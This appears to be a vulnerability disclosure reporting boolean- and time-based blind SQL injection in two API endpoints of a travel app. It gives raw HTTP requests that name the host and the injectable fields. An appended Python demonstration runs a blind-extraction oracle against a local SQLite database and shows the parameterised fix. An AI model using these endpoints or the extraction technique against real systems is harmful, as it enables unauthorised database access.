Aviation security: SQL injection in multiple okai sites
Target: the okai official APP
SQL injection exists at the following points:
I. userId in the POST body, boolean-based blind injection
    POST https://app.travelsky.com/ad//webService/advert-activ/buyOrder.action HTTP/1.1
    param: 2f554f71c0a145vs9ag496ng3e2df
    Content-Length: 56
    Content-Type: text/plain; charset=utf-8
    Host: app.travelsky.com
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; X9180 Build/KVT49L) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
    Cookie: Webtrends=113.118.98.249.1453524354727896
    Cookie2: $Version=1
    Accept-Encoding: gzip

    {"pageNo":"1","pageSize":"10","userId":"[email protected]"}
II. userEmail in the POST body, time-based blind injection
    POST https://app.travelsky.com/ad//webService/news/putUserKes.action HTTP/1.1
    param: 2f554f71c0a145vs9ag496ng3e2df
    Content-Type: application/json; charset=utf-8
    token:
    Role: 120
    Host: app.travelsky.com
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; X9180 Build/KVT49L) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
    Cookie: Webtrends=113.118.98.249.1453523602202277
    Cookie2: $Version=1
    Accept-Encoding: gzip

    {"conKey": "poor content quality", "userEmail": "[email protected]", "newsId": "20160123504582", "uuid": "863890026674804", "utype": "2"}
1. Current database users enumerated
2. Current database name enumerated
Solution:
Please kindly advise ~
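The report does not show the server-side code, so the following is an added illustration (not the report's or the vendor's code) of the bug class behind finding I and of the standard fix: a handler that concatenates the JSON userId field into its WHERE clause beside one that binds it as a parameter, with a small boolean-blind oracle showing why the first leaks data one true/false question at a time and the second does not. The table, column names and sample rows are assumptions constructed for the example, run on an in-memory SQLite database; the real backend is a Java Struts .action endpoint and is not reproduced here.

```python
"""Boolean-blind SQL injection in a JSON API: vulnerable vs. parameterised lookup.

Added example, not code from the report or the vendor. The schema, rows and
query shape below are assumptions that reproduce the *class* of bug offline.
"""
import json
import sqlite3

# Constructed sample data standing in for the advert/order table (assumption).
SCHEMA = """
CREATE TABLE buy_order (id INTEGER PRIMARY KEY, user_id TEXT, item TEXT);
INSERT INTO buy_order (user_id, item) VALUES
  ('alice@example.com', 'lounge pass'),
  ('alice@example.com', 'seat upgrade'),
  ('bob@example.com',   'wifi voucher');
"""


def connect():
    """Fresh in-memory database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def buy_order_vulnerable(conn, body):
    """Concatenates the JSON 'userId' field straight into the WHERE clause.

    Any quote in userId closes the literal and lets the caller append SQL.
    """
    params = json.loads(body)
    sql = ("SELECT item FROM buy_order WHERE user_id = '" + params["userId"] + "'"
           " ORDER BY id LIMIT " + str(int(params["pageSize"])))
    return [row[0] for row in conn.execute(sql)]


def buy_order_fixed(conn, body):
    """Binds 'userId' as a parameter: the value can never change the query shape."""
    params = json.loads(body)
    sql = "SELECT item FROM buy_order WHERE user_id = ? ORDER BY id LIMIT ?"
    args = (params["userId"], int(params["pageSize"]))
    return [row[0] for row in conn.execute(sql, args)]


def blind_probe(handler, conn, condition):
    """Boolean-blind oracle: append `condition` to a known-good userId and report
    whether the row still comes back (TRUE) or disappears (FALSE).

    Against the fixed handler the whole payload is matched as one literal string,
    so no user matches and the oracle returns FALSE regardless of `condition`.
    """
    payload = "bob@example.com' AND " + condition + " AND 'x'='x"
    body = json.dumps({"pageNo": "1", "pageSize": "10", "userId": payload})
    try:
        return len(handler(conn, body)) > 0
    except sqlite3.Error:
        return False


def leak_first_char(handler, conn, expression):
    """Recover the first character of an SQL expression one guess at a time,
    which is how a blind-injection tool enumerates database names and users.
    Returns None when the oracle never answers TRUE (i.e. the handler is safe).
    """
    for ch in "0123456789abcdefghijklmnopqrstuvwxyz_@.":
        if blind_probe(handler, conn, "substr(" + expression + ",1,1)='" + ch + "'"):
            return ch
    return None


if __name__ == "__main__":
    db = connect()
    print("vulnerable 1=1:", blind_probe(buy_order_vulnerable, db, "1=1"))
    print("vulnerable 1=2:", blind_probe(buy_order_vulnerable, db, "1=2"))
    print("fixed 1=1:     ", blind_probe(buy_order_fixed, db, "1=1"))
    print("leaked version char (vulnerable):",
          leak_first_char(buy_order_vulnerable, db, "sqlite_version()"))
    print("leaked version char (fixed):     ",
          leak_first_char(buy_order_fixed, db, "sqlite_version()"))
```

The same change applies to finding II: once userEmail is bound as a parameter, a time-delay function injected into it is stored or compared as a plain string and never executed, so the response time stops depending on the payload.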